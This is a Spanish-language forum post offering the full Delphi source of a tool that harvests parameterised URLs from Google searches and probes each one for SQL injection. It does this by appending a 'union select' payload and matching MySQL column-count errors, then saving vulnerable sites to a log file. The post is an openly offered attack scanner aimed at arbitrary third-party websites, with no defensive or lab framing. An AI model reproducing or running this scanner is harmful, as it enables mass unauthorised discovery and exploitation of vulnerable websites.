[Delphi] GoogleSearch 0.1

Iniciado por BigBear, 7 Junio 2013, 18:29 PM

0 Miembros y 1 Visitante están viendo este tema.

BigBear

Un simple programa para buscar paginas vulnerables a SQLI usando Google.

Una imagen :



El codigo  :

Código (delphi) [Seleccionar]

// Google Search 0.1
// Coded By Doddy H

unit goo;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, sButton, sSkinManager, IdURI, sMemo, PerlRegEx,
  IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, IdHTTP, jpeg,
  ExtCtrls, sEdit, sLabel, sGroupBox, sListBox, ComCtrls, sStatusBar, ShellApi,
  IdContext, IdCmdTCPClient;

type
  TForm1 = class(TForm)
    sSkinManager1: TsSkinManager;
    IdHTTP1: TIdHTTP;
    PerlRegEx1: TPerlRegEx;
    PerlRegEx2: TPerlRegEx;
    Image1: TImage;
    sGroupBox1: TsGroupBox;
    sLabel1: TsLabel;
    sLabel2: TsLabel;
    sEdit1: TsEdit;
    sEdit2: TsEdit;
    sGroupBox2: TsGroupBox;
    sListBox1: TsListBox;
    sGroupBox3: TsGroupBox;
    sGroupBox4: TsGroupBox;
    sListBox2: TsListBox;
    sStatusBar1: TsStatusBar;
    sButton1: TsButton;
    sButton2: TsButton;
    sButton3: TsButton;
    sButton4: TsButton;
    PerlRegEx3: TPerlRegEx;
    procedure sButton1Click(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    procedure sListBox1DblClick(Sender: TObject);
    procedure sListBox2DblClick(Sender: TObject);
    procedure sButton4Click(Sender: TObject);
    procedure sButton3Click(Sender: TObject);
    procedure sButton2Click(Sender: TObject);

  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

procedure savefile(filename, texto: string);
var
  ar: TextFile;

begin

  AssignFile(ar, filename);
  FileMode := fmOpenWrite;

  if FileExists(filename) then
    Append(ar)
  else
    Rewrite(ar);

  Writeln(ar, texto);
  CloseFile(ar);

end;

procedure TForm1.FormCreate(Sender: TObject);
var
  dir: string;
begin

  sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
  sSkinManager1.SkinName := 'falloutstyle';
  sSkinManager1.Active := True;

  dir := ExtractFilePath(Application.ExeName) + '/logs';

  if not(DirectoryExists(dir)) then
  begin
    CreateDir(dir);
  end;

  ChDir(dir);

end;

procedure TForm1.sButton1Click(Sender: TObject);
var
  code: string;
  link1: string;
  link2: string;
  linkfinal: string;
  z: integer;
  i: integer;
  ii: integer;
  target: string;
  linkfinalfinal: string;
  chau: TStringList;

begin

  target := StringReplace(sEdit1.text, ' ', '+', []);

  sListBox1.Items.Clear;

  for i := 1 to StrToInt(sEdit2.text) do
  begin
    ii := i * 10;

    sStatusBar1.Panels[0].text := '[+] Searching in page : ' + IntToStr(ii);
    Form1.sStatusBar1.Update;

    code := IdHTTP1.Get('http://www.google.com/search?hl=&q=' + target +
        '&start=' + IntToStr(ii));

    PerlRegEx1.Regex := '(?<="r"><. href=")(.+?)"';
    PerlRegEx1.Subject := code;

    while PerlRegEx1.MatchAgain do
    begin
      for z := 1 to PerlRegEx1.SubExpressionCount do

        link1 := PerlRegEx1.SubExpressions[z];

      PerlRegEx2.Regex := '\/url\?q\=(.*?)\&amp\;';
      PerlRegEx2.Subject := link1;

      if PerlRegEx2.Match then
      begin
        link2 := PerlRegEx2.SubExpressions[1];
        linkfinal := TIdURI.URLDecode(link2);
        sListBox1.Update;

        PerlRegEx3.Regex := '(.*?)=(.*?)';

        PerlRegEx3.Subject := linkfinal;

        if PerlRegEx3.Match then
        begin
          linkfinalfinal := PerlRegEx3.SubExpressions[1] + '=';
          sListBox1.Items.Add(linkfinalfinal);
        end;

      end;
    end;
  end;

  chau := TStringList.Create;

  chau.Duplicates := dupIgnore;
  chau.Sorted := True;
  chau.Assign(sListBox1.Items);
  sListBox1.Items.Clear;
  sListBox1.Items.Assign(chau);

  for i := sListBox1.Items.Count - 1 downto 0 do
  begin
    savefile('google-search.txt', sListBox1.Items[i]);
  end;

  sStatusBar1.Panels[0].text := '[+] Done';
  Form1.sStatusBar1.Update;

end;

procedure TForm1.sButton2Click(Sender: TObject);
var
  i: integer;
  code: string;

begin

  sListBox2.Items.Clear;

  sStatusBar1.Panels[0].text := '[+] Loading ...';
  Form1.sStatusBar1.Update;

  for i := sListBox1.Items.Count - 1 downto 0 do
  begin
    try
      begin

        sStatusBar1.Panels[0].text := '[+] Scanning : ' + sListBox1.Items[i];
        Form1.sStatusBar1.Update;
        sListBox2.Update;

        code := IdHTTP1.Get(sListBox1.Items[i] + '-1+union+select+1--');

        PerlRegEx1.Regex :=
          'The used SELECT statements have a different number of columns';
        PerlRegEx1.Subject := code;

        if PerlRegEx1.Match then
        begin
          sListBox2.Items.Add(sListBox1.Items[i]);
          savefile('sqli-founds.txt', sListBox1.Items[i]);
        end;

      end;
    except
      on E: EIdHttpProtocolException do
        ;
      on E: Exception do
        ;
    end;

    sStatusBar1.Panels[0].text := '[+] Done';
    Form1.sStatusBar1.Update;

  end;

end;

procedure TForm1.sButton3Click(Sender: TObject);
begin
  ShowMessage('Contact to lepuke[at]hotmail[com]');
end;

procedure TForm1.sButton4Click(Sender: TObject);
begin
  Form1.Close();
end;

procedure TForm1.sListBox1DblClick(Sender: TObject);
begin
  ShellExecute(Handle, 'open', 'google-search.txt', nil, nil, SW_SHOWNORMAL);
end;

procedure TForm1.sListBox2DblClick(Sender: TObject);
begin
  ShellExecute(Handle, 'open', 'sqli-founds.txt', nil, nil, SW_SHOWNORMAL);
end;

end.

// The End ?


Si quieren bajar el programa lo pueden hacer de aca.